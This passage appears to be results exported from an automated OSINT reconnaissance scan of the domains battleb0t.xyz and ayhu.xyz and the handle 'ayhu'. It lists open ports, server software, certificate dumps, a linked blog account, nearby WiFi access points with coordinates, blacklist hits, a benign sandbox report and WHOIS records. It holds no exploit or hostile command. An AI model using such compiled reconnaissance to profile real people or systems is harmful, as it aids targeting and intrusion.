6a:cd:e3:23:e6:23:db:2a:e9:31:93:fb:15:36:e7:dc:5c:fa:
c4:54:cb:5a:6a:98:38:29:87:fa:da:f5:13:2c:eb:21:a6:ca:
f5:a7:ff:b2:8b:c4:dc:75:27:1e:79:9e:da:a2:ef:91:70:58:
b0:db:99:37:98:c0:d2:e2:54:58:cd:4b:38:9f:64:cd:b8:28:
b3:53:a2:f7:25:f8:e5:6e:f5:cc:14:4f:d5:0c:26:d1:5d:4e:
26:51:28:7f:b6:23:ed:bf:75:93:69:22:6c:68:43:cc:6d:a2:
d1:16:79:71:e0:05:8c:5a:b0:10:74:43:19:6e:9b:04:0e:8c:
40:57:7c:d4:5f:a9:81:06:c7:26:a0:f5:3e:b1:df:d4:c4:1a:
2d:cd:6c:a6:e8:75:2e:d8:c6:69:39:72:bd:2b:3f:43:f8:67:
8b:9a:da:b6:90:6f:99:25:70:bc:1f:f3:ed:e2:ac:a1:e9:99:
1f:bc:90:9b:26:e4:c0:04:b6:b2:ea:2c:58:3b:a1:0e:f3:0c:
4e:9f:6c:9d
|
| 2023-05-12 02:54:30 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | nginx nginx | 64.226.81.43 |
| 2023-05-12 02:55:21 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | CaddyServer Caddy | 207.154.228.169 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 172.67.168.252 |
| 2023-05-12 03:09:26 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf
Signature Algorithm: ecdsa-with-SHA256
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
Validity
Not Before: Aug 3 00:00:00 2022 GMT
Not After : Aug 2 23:59:59 2023 GMT
Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:76:16:8f:f9:e3:b6:aa:dc:0b:91:40:d8:f1:ee:
e8:7f:8e:97:0e:7d:bd:b0:c5:93:63:66:fa:7b:4f:
17:a1:09:ff:20:68:33:a3:45:37:1f:e8:4b:eb:77:
53:b6:57:60:ef:a1:af:f1:36:97:26:c7:fa:95:e9:
9a:ab:1a:dd:7d
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F
X509v3 Subject Key Identifier:
18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90
X509v3 Subject Alternative Name:
DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl
Full Name:
URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt
X509v3 Basic Constraints: critical
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Aug 3 19:12:00.178 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:35:9E:7D:1C:03:B8:4A:87:C0:13:01:D5:
28:AD:64:70:5B:10:FC:72:88:58:48:7A:E3:4C:D5:27:
DB:76:00:22:02:20:12:E0:E2:34:44:22:24:C1:E5:7A:
25:12:AD:9E:F8:88:A1:A0:65:AF:1A:76:C9:03:41:4F:
8A:70:C8:E6:BA:DA
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 35:CF:19:1B:BF:B1:6C:57:BF:0F:AD:4C:6D:42:CB:BB:
B6:27:20:26:51:EA:3F:E1:2A:EF:A8:03:C3:3B:D6:4C
Timestamp : Aug 3 19:12:00.017 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:EE:6E:D3:CF:4A:8A:13:16:AB:6B:C2:
F7:32:B6:2A:5B:13:45:7A:44:ED:3B:86:8B:85:F4:94:
BA:E0:8C:12:60:02:21:00:8C:46:CA:E7:C6:A7:69:C8:
22:62:61:BA:E1:29:8F:BC:3C:BF:F4:A2:81:44:80:DA:
F5:C9:B6:E6:AF:CD:A6:FB
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B3:73:77:07:E1:84:50:F8:63:86:D6:05:A9:DC:11:09:
4A:79:2D:B1:67:0C:0B:87:DC:F0:03:0E:79:36:A5:9A
Timestamp : Aug 3 19:12:00.038 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:E5:0C:F6:4E:3C:40:01:1A:EC:D8:91:
2D:69:6A:1C:FF:4F:75:55:8C:D7:D2:38:86:36:36:FA:
EE:4F:65:29:FC:02:21:00:9F:BC:3F:8A:93:C7:A2:ED:
F5:94:99:85:01:90:F2:60:36:3B:2E:03:0E:E0:46:5E:
8C:3E:16:39:2B:64:D1:78
Signature Algorithm: ecdsa-with-SHA256
30:45:02:21:00:d8:35:e0:5c:fe:c9:39:b4:06:5a:95:36:1c:
73:f4:85:1c:c5:6e:6b:ef:48:76:d6:7f:a3:fe:55:ed:82:7f:
c5:02:20:7f:8c:86:3a:6f:04:3e:0d:d7:cc:87:51:a8:0d:5c:
ce:bc:93:88:aa:35:4a:5c:02:bb:47:5c:7c:87:7b:21:de
| 188.114.96.1 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Blogspot (Category: blog)
http://ayhu.blogspot.com | ayhu |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://kekw.battleb0t.xyz | kekw.battleb0t.xyz |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DCO (Net ID: 00:0C:41:66:5E:C3) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:01:24:F0:62:49) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Sobe5 (Net ID: 00:14:C1:15:47:B3) | 40.2024, 29.0398 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | xfinitywifi (Net ID: 00:0D:67:2F:5E:C6) | 39.0469, -77.4903 |
| 2023-05-12 03:03:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0066cc.github.io |
| 2023-05-12 03:38:37 | Blacklisted Affiliate IP Address | Yes | UCEPROTECT | 0 | 0 | 4 | 0 | None | UCEPROTECT - Level 2 (some false positives) (207.154.228.159) | 207.154.228.159 |
| 2023-05-12 02:45:35 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 1 | 0 | None | brett.ns.cloudflare.com | ayhu.xyz |
| 2023-05-12 03:03:22 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0.crimson-perch.github.io |
| 2023-05-12 02:54:44 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 35.229.48.116:80 | 35.229.48.116 |
| 2023-05-12 02:54:17 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2606:4700:3037::6815:470e:443 | 2606:4700:3037::6815:470e |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX55157320C (Net ID: 00:01:E3:57:32:0C) | 52.3759, 4.8975 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet55FA (Net ID: 00:01:36:59:55:F8) | 37.7813933,-122.3918002 |
| 2023-05-12 02:58:40 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://sprk.art/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_688_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_688_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1672"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_688_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_688_IESQMMUTEX_0_303"\n "IsoScope_688_ConnHashTable<1672>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_688_IE_EarlyTabStart_0xb80_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar6E6E.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar6E5E.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab6C48.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "Cab6D92.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "E74NBAN0.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\E74NBAN0.txt]- [targetUID: 00000000-00001672]\n Dropped file: "LMADHRH0.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LMADHRH0.txt]- [targetUID: 00000000-00001672]\n Dropped file: "H0X2P6A4.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H0X2P6A4.txt]- [targetUID: 00000000-00003496]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00001672]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003496]\n "RecoveryStore._FBA2F861-49C5-11ED-8C32-0800274FC8E2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Tar6E6E.tmp" has type "data"- Location: [%TEMP%\\Tar6E6E.tmp]- [targetUID: 00000000-00003496]\n "~DF86C9B3E24D11C32F.TMP" has type "data"- Location: [%TEMP%\\~DF86C9B3E24D11C32F.TMP]- [targetUID: 00000000-00001672]\n "A5E781EB8B970D49C10F5404D22E5FD7" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\A5E781EB8B970D49C10F5404D22E5FD7]- [targetUID: 00000000-00003496]\n "E74NBAN0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\E74NBAN0.txt]- [targetUID: 00000000-00001672]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00001672]\n "LMADHRH0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LMADHRH0.txt]- [targetUID: 00000000-00001672]\n "Tar6E5E.tmp" has type "data"- Location: [%TEMP%\\Tar6E5E.tmp]- [targetUID: 00000000-00003496]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003496]\n "Cab6C48.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"- Location: [%TEMP%\\Cab6C48.tmp]- [targetUID: 00000000-00003496]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00001672]\n "~DF5FC6F40784D161C2.TMP" has type "data"- Location: [%TEMP%\\~DF5FC6F40784D161C2.TMP]- [targetUID: 00000000-00001672]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00001672]\n "H0X2P6A4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H0X2P6A4.txt]- [targetUID: 00000000-00003496]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: sprk.art\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 426\nContent-Type: application/octet-stream\nDate: Wed, 12 Oct 2022 02:27:31 GMT\nEtag: "ed0b712b25ea3f6f62eb5eaeffcc657b-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01GF509F5VPQVTCDTRVY512617\n\n{\n "name": "",\n "short_name": "",\n "icons": [\n {\n "src": "/android-chrome-192x192.png",\n "sizes": "192x192",\n "type": "image/png"\n },\n {\n "src": "/android-chrome-512x512.png",\n "sizes": "512x512",\n "type": "image/png"\n }\n ],\n "theme_color": "#ffffff",\n "background_color": "#ffffff",\n "display": "standalone"\n}"\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: sprk.art\nDNT: 1\nConnection: Keep-Alive"\n "Wk(Ak(j)4FFB".....g}n~le.g\ng\ng\n)F F F!..I....Dt9vvvvvwxiuNG!<F%>F$_4b1xc0c0c01F$F$F$[.....imnnnnon\'KF\'sE)E\'F&[8^6p_5_4_4_4,E(E(E(.o....e9ffffgkG\'DE-E\nE+^E)X;Z:Z9[9[9[9Z9)E\nE\nE\n-+.... ] ^ ^ ^_bF.WE1E0E/QT?$V>V=V=V=V=V=E?C1E0E0E0<a^.... !S!U!V!V!VRF0<E4E4E4rA&PC3RBRARARARARARAsE5EE4E4E4_-{...\'"M"M"M"M!NMM\nE9E8E8E7LG\'NFNFNFNFNFNFNFNE#E9E8E8E8g *H...\'#E%#E#E#FE<VE<E<E<\\GMIJJJJJJJJJJJJJJIkD=1E=E<E<E;<: %---", "$=&$=$=#=dDAD@D@D@EO3ENENENENENENFNBL\n;BDAD@D@D@F7R\n---%5%5%5#0/G4DEDEDDDCASkASASASASASBRBPDEdDEDEDEDD%c---&.&-&-EFFDIDIDH=W=W=W=W=W>Vi>TDJJDIDIDIDHDH/Wk~-~-&)\'%\'%DLjDMDMDM8\\9[9[9[9[:ZQ.WDNJDMDMDMDMDLQj}-}-W\'"w\'"DQDQDQDQ}4`4`4`5_6^P@TDRZDQDQDQDQDPDO$7_|-|-%\'">\'"CUCUCUCU0c0d0d1cl@WCVlCUCUCUCUCUDT^J|-||-\'"\'"[CYCYCYCY-e/e/e+f\nXCZlCYCYCYCYCYCXCTd.%\'|-B\'"\'"C]C]C]C]C^/e/eIC^LC]C]C]C]C]C\\C[9*$|-CaCaCaCaCa/e#e\n@bCaCaCaCaCaC`C_+/v~+|-CeyCeCeCeCe<CevCeCeCeCeCeCc:z|}}}}~]Ci]CiCiCiCiCjCiCiCiCiCiChDlvvwwwwwxBm<BmBmBmBmBnBmbBmBmBmBmBljoKpqpppqBpBqBqBqBqBqyBvBqBqBqBqBqBohjjjjjjl/BsBuBuBuBuBuBvSBuBuBuBuBtU VcddddddnByaByByByByByByByByByBx \\) ] ] ] ] ] ^_\'B|B}B}B}B}B}B}B}B}B}!Vo W W W W W XoBAAAAAAABh"N!P!Q!Q!Q!Q!Q!SA%AAAAAAAAF"J"J"J"J"J"J"LAAkAAAAAAA2#D#D#D#D#D#D"KA\nAAAAAAA)$>$=$=$=$>#>9A#AAAAAA&$8$7$7$7$7$9\nA3AAAAA)%6%1%1%1%1A4AAAA3&+b&*&*&*A\'AAAD\'&\'$\'$\'$AAAK\'"z\'"\n "w|;fB69?0.#$=##>APH>eBPENJLFBCDWw8+%&)4nCNVPR6[?XzHPwDK7|Zp=Y\' 0N1CYT\\Y-dbG\\zCYCVr8!AmCeDfnKg<CeDa"Z|~sCaBpBrBrBo/@hko&B{XB}B}Cz Tt W ZyAAAAf"@#E"JA.AB`$-%1A+C1& <\'#y\'"\'"?\'"_WW/_??", "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 1\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 15086\nContent-Type: image/vnd.microsoft.icon\nDate: Wed, 12 Oct 2022 02:27:34 GMT\nEtag: "832bb1c355ca71f3a980bf41 | 34.74.170.74 |
| 2023-05-12 02:45:54 | Physical Coordinates | No | AbstractAPI | 94 | 0 | 4 | 0 | None | 39.0469, -77.4903 | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.35): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:12:12 | Co-Hosted Site - Domain Whois | No | Whois | 3 | 0 | 4 | 0 | None | Domain Name: scoop.sh
Registry Domain ID: 688a2dc7e3804150a8a7bd65025fc26d-DONUTS
Registrar WHOIS Server: whois.gandi.net
Registrar URL: https://www.gandi.net
Updated Date: 2022-05-25T08:13:34Z
Creation Date: 2013-06-20T11:02:06Z
Registry Expiry Date: 2023-06-20T11:02:06Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: QLD
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: ns-1530.awsdns-63.org
Name Server: ns-604.awsdns-11.net
Name Server: ns-308.awsdns-38.com
Name Server: ns-1776.awsdns-30.co.uk
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain Name: scoop.sh
Registry Domain ID: UNDEF-ROID
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2023-04-21T08:07:40Z
Creation Date: 2013-06-20T09:02:06Z
Registrar Registration Expiration Date: 2023-06-20T11:02:06Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Name Server: NS-604.AWSDNS-11.NET
Name Server: NS-1776.AWSDNS-30.CO.UK
Name Server: NS-308.AWSDNS-38.COM
Name Server: NS-1530.AWSDNS-63.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL:
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
| scoop.sh |
